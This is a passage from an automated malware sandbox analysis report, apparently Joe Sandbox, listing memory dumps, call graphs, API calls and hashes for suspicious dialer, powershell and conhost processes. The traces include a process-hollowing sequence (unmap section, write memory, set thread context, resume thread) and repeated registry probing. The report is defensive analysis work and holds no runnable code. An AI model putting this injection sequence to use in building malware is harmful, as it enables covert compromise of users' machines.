                                                          • Associated: 00000041.00000002.3442397948.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000041.00000002.3442510479.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_65_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID: fprintf
                                                          • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                          • API String ID: 383729395-3474627141
                                                          • Opcode ID: 79a37540ab94a2aabdfc59d1104a7611d6a6ce1f6ae517b76ce8c7da1563a69f
                                                          • Instruction ID: a3faaabf629437a0964f4525ace193ebe5e29d4333283446a04dc1db5ce24221
                                                          • Opcode Fuzzy Hash: 79a37540ab94a2aabdfc59d1104a7611d6a6ce1f6ae517b76ce8c7da1563a69f
                                                          • Instruction Fuzzy Hash: 47F09671A14A8482E612EF6AB9417ED6361E75D7C1F50D211FF4DA76A1DF3CD182C310

                                                          Control-flow Graph

                                                          [Control-flow graph: function at 14000219e, basic blocks 14000219e-140002280; calls EnterCriticalSection, LeaveCriticalSection, TlsGetValue and GetLastError]
                                                          Memory Dump Source
                                                          • Source File: 00000041.00000002.3442105288.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 00000041.00000002.3441829333.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000041.00000002.3442303779.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000041.00000002.3442397948.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000041.00000002.3442510479.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_65_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                          • String ID:
                                                          • API String ID: 682475483-0
                                                          • Opcode ID: 75c239d6f9b1b05cd32b51954dacabd1d99c2907a8b4144d0770202a5cd4097e
                                                          • Instruction ID: 57be894ec6e479b01b3bdbc431c3049754870fdb45279c41188df5f75f20f987
                                                          • Opcode Fuzzy Hash: 75c239d6f9b1b05cd32b51954dacabd1d99c2907a8b4144d0770202a5cd4097e
                                                          • Instruction Fuzzy Hash: 2F01B6B5305A0192FA5BDB53FD083D86364BB6CBD1F854021EF09536B4DB75C996C300

                                                          Callgraph

                                                          [Call graph: Function_0000000140832CB0 -> Function_0000000140832D30 -> Function_0000000140832CF2 and Function_0000000140832F61]

                                                          Control-flow Graph

                                                          [Control-flow graph: function at 140832d30, basic blocks 140832d30-140832f58; calls LoadLibraryA, GetProcAddressForCaller, ExitProcess and VirtualProtect (two sites)]
                                                          Memory Dump Source
                                                          • Source File: 00000042.00000002.3442004748.000000014082C000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 00000042.00000002.3441915647.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000042.00000002.3442004748.0000000140001000.00000040.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000042.00000002.3442004748.00000001404C8000.00000040.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000042.00000002.3442004748.00000001404EC000.00000040.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000042.00000002.3442004748.0000000140777000.00000040.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000042.00000002.3442004748.00000001407F8000.00000040.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000042.00000002.3445427003.0000000140834000.00000004.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_66_2_140000000_dialer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ProtectVirtual$AddressCallerLibraryLoadProc
                                                          • String ID:
                                                          • API String ID: 1941872368-0
                                                          • Opcode ID: fc7b6a3bd621f7d17f98b0102345922539b498eb494b6f3c4a19026b9e8f6b5c
                                                          • Instruction ID: 490267afce550785c801030b00c3b8e77ffef9829ef37814adfd0db67bac2f23
                                                          • Opcode Fuzzy Hash: fc7b6a3bd621f7d17f98b0102345922539b498eb494b6f3c4a19026b9e8f6b5c
                                                          • Instruction Fuzzy Hash: 97614832F4025745FB275BAAEB853E86350A39D7B4F084721CBB9433F6E67A88568310

                                                          Control-flow Graph

                                                          control_flow_graph 1011 7ffd3469df98-7ffd3469e049 1025 7ffd3469e04b-7ffd3469e069 1011->1025 1026 7ffd3469e0af-7ffd346a0b08 NtUnmapViewOfSection 1011->1026 1031 7ffd346a0b0a 1026->1031 1032 7ffd346a0b10-7ffd346a0b2c 1026->1032 1031->1032
                                                          Memory Dump Source
                                                          • Source File: 00000043.00000002.2364080714.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_67_2_7ffd34690000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 66ec87d1f945297e3181e69690fae1ffa74a1eb4fde3fadaa7c2ff384a7652f8
                                                          • Instruction ID: 82a8c91f6afa6bfd9fba6e4defae79b1022a98334ea342f0b0534a8788f6c2ef
                                                          • Opcode Fuzzy Hash: 66ec87d1f945297e3181e69690fae1ffa74a1eb4fde3fadaa7c2ff384a7652f8
                                                          • Instruction Fuzzy Hash: A451E772A0D7844FDB12EB6898A56EA7FA0EF53214F0841FFC189CB193E95C9809CB51

                                                          Control-flow Graph

                                                          control_flow_graph 1055 7ffd346a0c5d-7ffd346a0c69 1056 7ffd346a0c6b-7ffd346a0c73 1055->1056 1057 7ffd346a0c74-7ffd346a0ce8 1055->1057 1056->1057 1061 7ffd346a0cea-7ffd346a0cef 1057->1061 1062 7ffd346a0cf2-7ffd346a0d35 NtWriteVirtualMemory 1057->1062 1061->1062 1063 7ffd346a0d37 1062->1063 1064 7ffd346a0d3d-7ffd346a0d5a 1062->1064 1063->1064
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000043.00000002.2364080714.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_67_2_7ffd34690000_powershell.jbxd
                                                          Similarity
                                                          • API ID: MemoryVirtualWrite
                                                          • String ID:
                                                          • API String ID: 3527976591-0
                                                          • Opcode ID: 612906cca72b36756ae939d45c578b6aaeaa4ccc295d5ed56250a67fa343742e
                                                          • Instruction ID: cf6917a5f3970e6c90ade028a1361540a4590a50daaeaa04103089dfeb89879e
                                                          • Opcode Fuzzy Hash: 612906cca72b36756ae939d45c578b6aaeaa4ccc295d5ed56250a67fa343742e
                                                          • Instruction Fuzzy Hash: 5831D17190CB588FDB59DF58D8856E9BBE0FB6A321F04426ED049D3652CB74A806CB81

                                                          Control-flow Graph

                                                          control_flow_graph 1065 7ffd3469e078-7ffd3469e096
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000043.00000002.2364080714.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_67_2_7ffd34690000_powershell.jbxd
                                                          Similarity
                                                          • API ID: SectionUnmapView
                                                          • String ID:
                                                          • API String ID: 498011366-0
                                                          • Opcode ID: 75dc07dcbcd93011774c4f58a512b55f34254de34682c1b82d4496a8e22111da
                                                          • Instruction ID: 765639b25ce54d57d4f7054c0e5e9c1493ceb19fde21871af582bbb98654a14e
                                                          • Opcode Fuzzy Hash: 75dc07dcbcd93011774c4f58a512b55f34254de34682c1b82d4496a8e22111da
                                                          • Instruction Fuzzy Hash: 01315772A0CA488FEB59CF58D8497E9BBE0EBA6320F04416FD049D3193D674EC49C751

                                                          Control-flow Graph

                                                          control_flow_graph 1068 7ffd346a0a3e-7ffd346a0a4b 1069 7ffd346a0a56-7ffd346a0b08 NtUnmapViewOfSection 1068->1069 1070 7ffd346a0a4d-7ffd346a0a55 1068->1070 1075 7ffd346a0b0a 1069->1075 1076 7ffd346a0b10-7ffd346a0b2c 1069->1076 1070->1069 1075->1076
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000043.00000002.2364080714.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_67_2_7ffd34690000_powershell.jbxd
                                                          Similarity
                                                          • API ID: SectionUnmapView
                                                          • String ID:
                                                          • API String ID: 498011366-0
                                                          • Opcode ID: 695bfb8554aac46042955458ff34f7189e86082f10c92c17940f7abc9413e331
                                                          • Instruction ID: 9c8db3c6c0b1ee288027724737dc919241a36ef91875f313038629c39156f85e
                                                          • Opcode Fuzzy Hash: 695bfb8554aac46042955458ff34f7189e86082f10c92c17940f7abc9413e331
                                                          • Instruction Fuzzy Hash: 1B31F531A0DB888FDB5ADFA888967E97FE0EF67320F04419AD049C7193D664A446CB91

                                                          Control-flow Graph

                                                          control_flow_graph 1077 7ffd346a0fe4-7ffd346a0feb 1078 7ffd346a0ff6-7ffd346a10a2 NtResumeThread 1077->1078 1079 7ffd346a0fed-7ffd346a0ff5 1077->1079 1083 7ffd346a10aa-7ffd346a10c6 1078->1083 1084 7ffd346a10a4 1078->1084 1079->1078 1084->1083
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000043.00000002.2364080714.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_67_2_7ffd34690000_powershell.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: 40dd2c0a98b87b5a02a67e615f33549286361dadeacf3c68315bb18a64fa482a
                                                          • Instruction ID: e645ccfde1a18c15cd84b90129f0a80504258ebf7b20163a690026f068f68ab6
                                                          • Opcode Fuzzy Hash: 40dd2c0a98b87b5a02a67e615f33549286361dadeacf3c68315bb18a64fa482a
                                                          • Instruction Fuzzy Hash: F3312871A0CA5C8FDB59DF9CD8457EA7BE1EF56320F04416BD008D3252CB749806CB91

                                                          Control-flow Graph

                                                          control_flow_graph 1085 7ffd346a0f20-7ffd346a0fb8 NtSetContextThread 1089 7ffd346a0fba 1085->1089 1090 7ffd346a0fc0-7ffd346a0fdc 1085->1090 1089->1090
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000043.00000002.2364080714.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_67_2_7ffd34690000_powershell.jbxd
                                                          Similarity
                                                          • API ID: ContextThread
                                                          • String ID:
                                                          • API String ID: 1591575202-0
                                                          • Opcode ID: eb9860b81eab79942769cb89c151e76948351e05a2b950a32e99cc36f769f3b6
                                                          • Instruction ID: 4b9f8eb3e113d47e751419c1390d51366aa8484edecac7fc375c039f71d3b9e9
                                                          • Opcode Fuzzy Hash: eb9860b81eab79942769cb89c151e76948351e05a2b950a32e99cc36f769f3b6
                                                          • Instruction Fuzzy Hash: A621B431A0CA4C8FDB59DF98D8867E97BF0EB66320F04416FD049D3252C6749846CB51

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000043.00000002.2364080714.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_67_2_7ffd34690000_powershell.jbxd
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID: wKX\$wKX\
                                                          • API String ID: 963392458-3281236502
                                                          • Opcode ID: 473a1797e3848129c2fdea48e846f90c01edc82dfdcf274be323848b577e10e1
                                                          • Instruction ID: 2f1c806e5358b175a00eae8ccdbb0497aa8d2c352a26586deab7d6c75eddc0b8
                                                          • Opcode Fuzzy Hash: 473a1797e3848129c2fdea48e846f90c01edc82dfdcf274be323848b577e10e1
                                                          • Instruction Fuzzy Hash: 39D1F670609F894FEBA4DF2CC8967E977E0FF56310F04426BD84DC7292DA38A4458B82

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000043.00000002.2364080714.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_67_2_7ffd34690000_powershell.jbxd
                                                          Similarity
                                                          • API ID: CreateFileMapping
                                                          • String ID: wKX\$wKX\
                                                          • API String ID: 524692379-3281236502
                                                          • Opcode ID: 1edc40a78630b73ad1bd5566d9d7ffd68b1f33f0f1d5c02a7601f1fcc9fd5ce1
                                                          • Instruction ID: bfff3acdf0620676f126d19815347555e2b23580ac7183643492abbd611a99a6
                                                          • Opcode Fuzzy Hash: 1edc40a78630b73ad1bd5566d9d7ffd68b1f33f0f1d5c02a7601f1fcc9fd5ce1
                                                          • Instruction Fuzzy Hash: 0171E77060CB8D8FDB59DF28C8557E87BE1FF5A311F14426AE88DC7292DB74A8418B81

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000043.00000002.2364080714.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_67_2_7ffd34690000_powershell.jbxd
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID: wKX\$wKX\
                                                          • API String ID: 823142352-3281236502
                                                          • Opcode ID: c49007042b4ae1135fb501050c0d8f29d89328b8aeec5cd13c32a8c5e5c99913
                                                          • Instruction ID: 4f580a1f5a782cf58d0714f8c290668c6f98e123386c198430670a850cae325a
                                                          • Opcode Fuzzy Hash: c49007042b4ae1135fb501050c0d8f29d89328b8aeec5cd13c32a8c5e5c99913
                                                          • Instruction Fuzzy Hash: EC61D730918B8D4FEB58DF68D8567E877E0FF59311F14426AE84DC3292DB74E8418B81
                                                          Memory Dump Source
                                                          • Source File: 00000043.00000002.2365643408.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_67_2_7ffd34760000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c5916a07696d479b5750dec19bea913bed7606b1019d65fa44af7531a3570130
                                                          • Instruction ID: cf3983f0cc6181169d53ffa0cf0b3637757ab8076dcc94c4ac28b01991012d58
                                                          • Opcode Fuzzy Hash: c5916a07696d479b5750dec19bea913bed7606b1019d65fa44af7531a3570130
                                                          • Instruction Fuzzy Hash: 7013D371A1CF958BE7B59F189895AA977E1EF99740F0505AED48CC3292CE38BC40C7C2
                                                          Memory Dump Source
                                                          • Source File: 00000043.00000002.2365643408.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_67_2_7ffd34760000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9b8811ce3f85bab14d456c4944db9821eb7659b810540003bb49270194910c46
                                                          • Instruction ID: 5a21975f14aa1ab7a654fbf64c69c3b46e95f0312c46edf240bc709221cde42e
                                                          • Opcode Fuzzy Hash: 9b8811ce3f85bab14d456c4944db9821eb7659b810540003bb49270194910c46
                                                          • Instruction Fuzzy Hash: 1413D471A1CF958BE7749F1898D5AA977E1EB99740F0505AED58CC3292CE38BC40CBC2

                                                          Control-flow Graph

                                                          control_flow_graph 1033 7ffd3469ed66-7ffd3469ed73 1034 7ffd3469ed75-7ffd3469ed7d 1033->1034 1035 7ffd3469ed7e-7ffd3469ed8f 1033->1035 1034->1035 1036 7ffd3469ed9a-7ffd3469edaa 1035->1036 1037 7ffd3469ed91-7ffd3469ed99 1035->1037 1038 7ffd3469edac-7ffd3469eddc 1036->1038 1039 7ffd3469ede0-7ffd3469ee51 MapViewOfFile 1036->1039 1037->1036 1038->1039 1042 7ffd3469ee59-7ffd3469ee76 1039->1042 1043 7ffd3469ee53 1039->1043 1043->1042
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000043.00000002.2364080714.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_67_2_7ffd34690000_powershell.jbxd
                                                          Similarity
                                                          • API ID: FileView
                                                          • String ID:
                                                          • API String ID: 3314676101-0
                                                          • Opcode ID: fe81f5581243c5689c997e106a96b86f4061994ea6ae2098baedbb43c9012268
                                                          • Instruction ID: 8b7fd2c79850a316c51c3f12072b9315131d5f6966ce354e8beb8bbec3eaa84a
                                                          • Opcode Fuzzy Hash: fe81f5581243c5689c997e106a96b86f4061994ea6ae2098baedbb43c9012268
                                                          • Instruction Fuzzy Hash: 71413A3190CA888FEB1DDB68D855AE97BF0FF56321F14026FD089D3192DB686806C791

                                                          Control-flow Graph

                                                          control_flow_graph 1044 7ffd3469e7a8-7ffd3469e7af 1045 7ffd3469e7ba-7ffd3469e7ca 1044->1045 1046 7ffd3469e7b1-7ffd3469e7b9 1044->1046 1047 7ffd3469e7cc-7ffd3469e7ff 1045->1047 1048 7ffd3469e800-7ffd3469e870 K32GetModuleInformation 1045->1048 1046->1045 1047->1048 1052 7ffd3469e878-7ffd3469e8a7 1048->1052 1053 7ffd3469e872 1048->1053 1053->1052
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000043.00000002.2364080714.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_67_2_7ffd34690000_powershell.jbxd
                                                          Similarity
                                                          • API ID: InformationModule
                                                          • String ID:
                                                          • API String ID: 3425974696-0
                                                          • Opcode ID: 76e86c87fcab641a7a14e27d24f4118fd5b604c0817560ccc7a1edcb80116e8a
                                                          • Instruction ID: 851c10cd9a3051c0a482f962e7ea166f9159ea068ed44e9c9527fd565d602557
                                                          • Opcode Fuzzy Hash: 76e86c87fcab641a7a14e27d24f4118fd5b604c0817560ccc7a1edcb80116e8a
                                                          • Instruction Fuzzy Hash: AB31E531A0CA5C4FDB18DBAC98496F9BBE1EF66321F04426FD049D3292DB756846CB81
                                                          Memory Dump Source
                                                          • Source File: 00000043.00000002.2365643408.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_67_2_7ffd34760000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3da8c0ea446b2eef2df44d8648b3fd8f7940c971a5b44865a81098ad7d7a2531
                                                          • Instruction ID: 894922bd3293ad6ed27d644efa51755c8b68f934d8657c360205c7d6e0de46da
                                                          • Opcode Fuzzy Hash: 3da8c0ea446b2eef2df44d8648b3fd8f7940c971a5b44865a81098ad7d7a2531
                                                          • Instruction Fuzzy Hash: 0DB1F9A2B0EBC54FE7D6AA2858A91707BD2EF57220B1801FBD58DCB1D3D91D6C05D381
                                                          Memory Dump Source
                                                          • Source File: 00000043.00000002.2365643408.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_67_2_7ffd34760000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 91dac2f24d6214e3b69d48b0b5f2786e8de444b18248258c154829b5854989f9
                                                          • Instruction ID: 759de711ff82d5edf2578251cde0d37400c2716c5e8ed83dcfaadc4d11251abc
                                                          • Opcode Fuzzy Hash: 91dac2f24d6214e3b69d48b0b5f2786e8de444b18248258c154829b5854989f9
                                                          • Instruction Fuzzy Hash: 712106A3B0E6854FE3E5A67828E917477C1EF6612075805FAC45DCB2D3D81DAC099381

                                                          Control-flow Graph

                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32 ref: 00000146F6B03639
                                                          • PathFindFileNameW.SHLWAPI ref: 00000146F6B03648
                                                            • Part of subcall function 00000146F6B03C74: StrCmpNIW.SHLWAPI(?,?,?,00000146F6B0254B), ref: 00000146F6B03C8C
                                                            • Part of subcall function 00000146F6B03BC0: GetModuleHandleW.KERNEL32(?,?,?,?,?,00000146F6B0365F), ref: 00000146F6B03BCE
                                                            • Part of subcall function 00000146F6B03BC0: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000146F6B0365F), ref: 00000146F6B03BFC
                                                            • Part of subcall function 00000146F6B03BC0: VirtualProtectEx.KERNEL32(?,?,?,?,?,00000146F6B0365F), ref: 00000146F6B03C1E
                                                            • Part of subcall function 00000146F6B03BC0: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000146F6B0365F), ref: 00000146F6B03C39
                                                            • Part of subcall function 00000146F6B03BC0: VirtualProtectEx.KERNEL32(?,?,?,?,?,00000146F6B0365F), ref: 00000146F6B03C5A
                                                          • CreateThread.KERNELBASE ref: 00000146F6B0368F
                                                            • Part of subcall function 00000146F6B01D40: GetCurrentThread.KERNEL32 ref: 00000146F6B01D4B
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                          • String ID:
                                                          • API String ID: 1683269324-0
                                                          • Opcode ID: f925565bd7d4be1ed18a10d933f5cc473e240d0c1127f16e8bee8d0f787d3ad7
                                                          • Instruction ID: 51cedc3a1edaa9a1f4d882f119d1d84ac442923403cee7fb7dfbe4ae4bd87c79
                                                          • Opcode Fuzzy Hash: f925565bd7d4be1ed18a10d933f5cc473e240d0c1127f16e8bee8d0f787d3ad7
                                                          • Instruction Fuzzy Hash: 19114030634602A2F7649B70B62D3D92A90BB5634DF50612595CE816B5EF7CCC7F8B02
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000003.2254610774.00000146F6AD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000146F6AD0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_3_146f6ad0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: 8f72cda2533f8c81468787ed5508378e1f4737ebbed7a3ee8edbd934de0862d8
                                                          • Instruction ID: b572ca268c0c6919de6356c2d1f115cc6cbd0eaecf00e1421cc4dcfe034cb51f
                                                          • Opcode Fuzzy Hash: 8f72cda2533f8c81468787ed5508378e1f4737ebbed7a3ee8edbd934de0862d8
                                                          • Instruction Fuzzy Hash: A691027270125087EB648F35E2207ADB792FB56B98F5481249F8E4779CDA38EC2BC701

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 00000146F6B01628: GetProcessHeap.KERNEL32 ref: 00000146F6B01633
                                                            • Part of subcall function 00000146F6B01628: HeapAlloc.KERNEL32 ref: 00000146F6B01642
                                                            • Part of subcall function 00000146F6B01628: RegOpenKeyExW.ADVAPI32 ref: 00000146F6B016B2
                                                            • Part of subcall function 00000146F6B01628: RegOpenKeyExW.ADVAPI32 ref: 00000146F6B016DF
                                                            • Part of subcall function 00000146F6B01628: RegCloseKey.ADVAPI32 ref: 00000146F6B016F9
                                                            • Part of subcall function 00000146F6B01628: RegOpenKeyExW.ADVAPI32 ref: 00000146F6B01719
                                                            • Part of subcall function 00000146F6B01628: RegCloseKey.ADVAPI32 ref: 00000146F6B01734
                                                            • Part of subcall function 00000146F6B01628: RegOpenKeyExW.ADVAPI32 ref: 00000146F6B01754
                                                            • Part of subcall function 00000146F6B01628: RegCloseKey.ADVAPI32 ref: 00000146F6B0176F
                                                            • Part of subcall function 00000146F6B01628: RegOpenKeyExW.ADVAPI32 ref: 00000146F6B0178F
                                                            • Part of subcall function 00000146F6B01628: RegCloseKey.ADVAPI32 ref: 00000146F6B017AA
                                                            • Part of subcall function 00000146F6B01628: RegOpenKeyExW.ADVAPI32 ref: 00000146F6B017CA
                                                          • SleepEx.KERNELBASE ref: 00000146F6B01AE3
                                                            • Part of subcall function 00000146F6B01628: RegCloseKey.ADVAPI32 ref: 00000146F6B017E5
                                                            • Part of subcall function 00000146F6B01628: RegOpenKeyExW.ADVAPI32 ref: 00000146F6B01805
                                                            • Part of subcall function 00000146F6B01628: RegCloseKey.ADVAPI32 ref: 00000146F6B01820
                                                            • Part of subcall function 00000146F6B01628: RegOpenKeyExW.ADVAPI32 ref: 00000146F6B01840
                                                            • Part of subcall function 00000146F6B01628: RegCloseKey.ADVAPI32 ref: 00000146F6B0185B
                                                            • Part of subcall function 00000146F6B01628: RegOpenKeyExW.ADVAPI32 ref: 00000146F6B0187B
                                                            • Part of subcall function 00000146F6B01628: RegCloseKey.ADVAPI32 ref: 00000146F6B01896
                                                            • Part of subcall function 00000146F6B01628: RegCloseKey.ADVAPI32 ref: 00000146F6B018A0
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: CloseOpen$Heap$AllocProcessSleep
                                                          • String ID:
                                                          • API String ID: 948135145-0
                                                          • Opcode ID: 65153283aa6c96ced916157d2f86422634ff98b4549c9c2683df96b80b9c3d6c
                                                          • Instruction ID: be59e10a0c1fcdc56d45c2691308c28a0a3cc9a52ee0e711111c1862e5128af4
                                                          • Opcode Fuzzy Hash: 65153283aa6c96ced916157d2f86422634ff98b4549c9c2683df96b80b9c3d6c
                                                          • Instruction Fuzzy Hash: 70312A7163160172FB58AB76F7703D91794A786BC8F4460119E8D877B5EF20CC7A8252

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                          • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                          • API String ID: 2119608203-3850299575
                                                          • Opcode ID: eeb4c9d13e4d9331326a316f022dbcf34e2f04a28c739e06152b1c27ab991b03
                                                          • Instruction ID: a8973a0723123a1e7873ada1854a2eefcb06123bcf56c086b7f37613088a03d7
                                                          • Opcode Fuzzy Hash: eeb4c9d13e4d9331326a316f022dbcf34e2f04a28c739e06152b1c27ab991b03
                                                          • Instruction Fuzzy Hash: 57B1A032230650A2EB698F35E7607D96FA4FB46B88F406116EE8D537A4DB34CC6EC341
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmp
